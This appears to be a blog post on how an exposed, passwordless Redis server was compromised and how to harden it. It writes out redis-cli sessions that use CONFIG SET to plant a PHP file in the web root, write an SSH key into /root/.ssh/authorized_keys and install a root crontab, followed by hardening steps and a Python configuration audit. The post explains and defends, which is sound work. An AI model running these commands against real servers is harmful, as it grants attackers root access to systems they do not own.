Recently, the company's web server has been hit by cryptomining attacks several times. At first I thought the upload service had a vulnerability that let an attacker upload an executable script to the server and run it, so the upload service was modified to add various checks on file format, extension and so on. The server was attacked again anyway. The final investigation found the real cause: the Redis configuration was not strict. The attacker used the CONFIG command to write a crontab scheduled task and to set up passwordless SSH login.

Many Redis installations keep the default configuration (default listening address and port) and set no password. That configuration can leave the server running Redis open to attack.

1. Attack

The CONFIG command changes the Redis configuration without restarting the Redis service. Each of the attacks below uses CONFIG SET to change the directory and file name that Redis writes its data dump to.

⓵ webshell

If the root directory of a website is known, then Redis can be used for webshell attacks:

  • First, set the Redis data directory to the site root

  • Then write the code to be executed into the site root via Redis commands

dummyUser@XPS13:~$ redis-cli -h 10.10.10.1
10.10.10.1:6379> config set dir /usr/local/nginx/html
OK
10.10.10.1:6379> config set dbfilename redis.php
OK
10.10.10.1:6379> set test "
      "
OK
10.10.10.1:6379> save
OK

After this, a file named redis.php exists in the site root. Requesting that file through its URL reveals all of the server's PHP configuration information.

⓶ SSH

If we know which user and group Redis runs as and that this user has write permission on its own home directory (Redis is sometimes run as root), we can use Redis to log in to the server over SSH without a password.

  • Generate a public/private key pair locally with ssh-keygen -t rsa
  • Write the generated public key, padded with blank lines, to a text file: (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > key.txt
  • Load the text file into Redis: cat key.txt | redis-cli -h 10.10.10.1 -x set ssh_key
  • Save the public key to authorized_keys:
dummyUser@XPS13:~$ redis-cli -h 10.10.10.1
10.10.10.1:6379> config set dir /root/.ssh
OK
10.10.10.1:6379> config set dbfilename authorized_keys
OK
10.10.10.1:6379> save
OK

Once these steps are complete, you can log in to the server with ssh root@10.10.10.1

⓷ crontab

Scheduled tasks are normally configured on a server with crontab -e, but they are simply stored in files on the server (under /var/spool/cron/ on CentOS and /var/spool/cron/crontabs/ on Ubuntu). So a scheduled task can be written to the server through Redis commands in the same way.

dummyUser@XPS13:~$ echo -e "\n\n * * * * * command to execute" | redis-cli -h 10.10.10.1 -x set cron
OK
dummyUser@XPS13:~$ redis-cli -h 10.10.10.1
10.10.10.1:6379> config set dir /var/spool/cron
OK
10.10.10.1:6379> config set dbfilename root
OK
10.10.10.1:6379> save
OK

2. Prevention

⓵ Bind to a fixed IP address

Change the bind address in the Redis configuration file to a fixed IP address (usually an internal network address) and restart Redis. The Redis service then only accepts connections arriving on that internal address, and nobody can connect to it directly from the Internet.

⓶ Set a password

The Redis service has no password by default. You can set just a password with requirepass, or also a matching user name with masteruser. Clients must then authenticate with the AUTH command before their operations succeed.

Because Redis is very fast, an external attacker can try up to a million passwords per second, so make the password as long and complex as possible.

⓷ Disable some sensitive commands

Dangerous Redis commands such as CONFIG, KEYS, FLUSHDB and SHUTDOWN can be disabled in the configuration file by renaming them to an empty string:

rename-command FLUSHDB "" 
rename-command CONFIG "" 
rename-command KEYS ""

⓸ SSL/TLS

Redis supports SSL/TLS from version 6.0; build it with the BUILD_TLS=yes option at installation time. Doing so significantly degrades Redis performance, however.


In addition, do not run the Redis service as root. Create a dedicated user and group with the minimum permissions Redis needs and run it under that account.
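As an added example, not from the original post, here is a small Python audit that checks the settings discussed in this section (bind, requirepass, rename-command) and also flags dir/dbfilename values that match the SSH, cron and web-root write locations used by the attacks above. The sample configuration is constructed for the example; the same audit can be run over the reply of CONFIG GET, which matters because the attacks change the running configuration rather than the file.

```python
# Constructed sample redis.conf: defaults left in place, one command disabled,
# and a dump location like the one the crontab attack sets.
SAMPLE_CONF = """\
# bind 127.0.0.1
port 6379
dir /var/spool/cron
dbfilename root
rename-command FLUSHDB ""
"""

def parse_redis_conf(text):
    """Map each redis.conf directive (lower-cased) to its values, in file order."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        conf.setdefault(key.lower(), []).append(value.strip())
    return conf

def from_config_get(flat):
    """Convert the flat [name, value, name, value, ...] reply of CONFIG GET into the same mapping."""
    return {flat[i].lower(): [flat[i + 1]] for i in range(0, len(flat) - 1, 2)}

def audit(conf):
    """Return findings for the weaknesses the attacks above rely on (empty list = hardened)."""
    findings = []
    bind = conf.get("bind", [""])[-1]
    if not bind or "0.0.0.0" in bind.split():
        findings.append("bind: listening on all interfaces; bind to an internal IP")
    password = conf.get("requirepass", [""])[-1].strip('"')
    if not password:
        findings.append("requirepass: no password set")
    elif len(password) < 16:
        findings.append("requirepass: password shorter than 16 characters")
    # A command counts as disabled only when renamed to the empty string.
    disabled = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()[-1] == '""'}
    for cmd in ("CONFIG", "FLUSHDB", "KEYS", "SHUTDOWN"):
        if cmd not in disabled:
            findings.append(f"rename-command: {cmd} is not disabled")
    # Indicators of the write-anywhere abuse: dump aimed at .ssh, cron spool or a PHP file.
    d = conf.get("dir", ["./"])[-1].rstrip("/")
    f = conf.get("dbfilename", ["dump.rdb"])[-1]
    if d.endswith("/.ssh") or d.startswith("/var/spool/cron") or f in ("authorized_keys", "root") or f.endswith(".php"):
        findings.append(f"dir/dbfilename: {d}/{f} looks like an attacker-set dump location")
    return findings

if __name__ == "__main__":
    for finding in audit(parse_redis_conf(SAMPLE_CONF)):
        print(finding)
```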